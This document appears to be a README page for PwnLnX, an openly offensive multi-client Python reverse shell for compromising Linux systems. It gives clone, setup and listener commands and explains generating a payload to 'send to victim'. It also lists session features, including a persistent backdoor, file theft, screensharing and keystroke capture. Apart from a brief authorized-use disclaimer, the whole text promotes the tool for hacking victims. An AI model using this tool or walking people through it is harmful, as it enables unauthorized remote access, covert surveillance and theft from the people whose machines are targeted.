PwnLnX Reverse Shell For Hacking Linux Systems
PwnLnX Reverse Shell For Hacking Linux Systems

PwnLnX: Reverse Shell For Hacking Linux Systems

An advanced multi-threadedmulti-client python reverse shell for hacking linux systems. There’s still more work to do so feel free to help out with the development.

Please follow these instructions to get a copy of PwnLnX running on your local machine without any problems.

Getting Started

Prerequisites

  • Python3:
    • vidstream
    • pyfiglet
    • tqdm
    • mss
    • termcolor
    • pyautogui
    • pyinstaller
    • pip3
    • pynput

Installing

"
"
# Download source code
git clone https://github.com/spectertraww/PwnLnX.git


cd PwnLnX

# download and  install the dipendences
chmod +x setup.sh

./setup.sh

Getting PwnLnx up and running

  • Show help
python3 PwnLnX.py --help
Command help for PwnLnX
Command help for PwnLnX
  • Listening for incoming connections
python3 PwnLnX.py --lhost [your localhost ip address] --lport [free port for listening incoming connections]
Start with PwnLnX
Start with PwnLnX
Waiting for connection
Waiting for connection
  • Creating/Generating a payload
chmod +x PwnGen.sh
./PwnGen.sh
Generate payload
Generate payload

Then follow the procedure to successifully create your payload, the payload is saved in PwnLnx directory. Send the created payload to victim.

PwnLnx Usage

CommandUsage
helpshow help
exitclose all the sessions and quit the progaram.
show sessionsshow all available sessions from connected.
session [ID]interact with a specified session ID.
kill [all/ID]kill a specified session or all to kill all sessions.
bannerhave funny by changing the program banner
Show sessions
Show sessions

Interact with a session

CommandUsage
helpshow help.
quitclose the current session.
backgroundbackground the current session.
sysinfoget minimum target system information.
create_persistcreate a persistant backdoor.
uploadupload the specified filename to the target system.
downloaddownload the specified filename from the target system.
screenshottake a desktop screenshot of the target system.
start_screensharestart desktop screensharing.
stop_screensharestop desktop screensharing.
start_keycapstart capturing victim’s pressed keystrokes.
dump_keycapdump/get the captured keystrokes.
stop_keycapstop the capturing keystrokes.
Interacting with session
Interacting with session

Note

You can also execute linux system commands besides those listed above.

Command ls
Command ls

Report Bugs: spectertraww@gmail.com

Disclaimer

This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.

Dark Mode

PwnLnX (this link opens in a new window) by spectertraww (this link opens in a new window)

An advanced multi-threaded, multi-client python reverse shell for hacking linux systems. There’s still more work to do so feel free to help out with the development. Disclaimer: This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.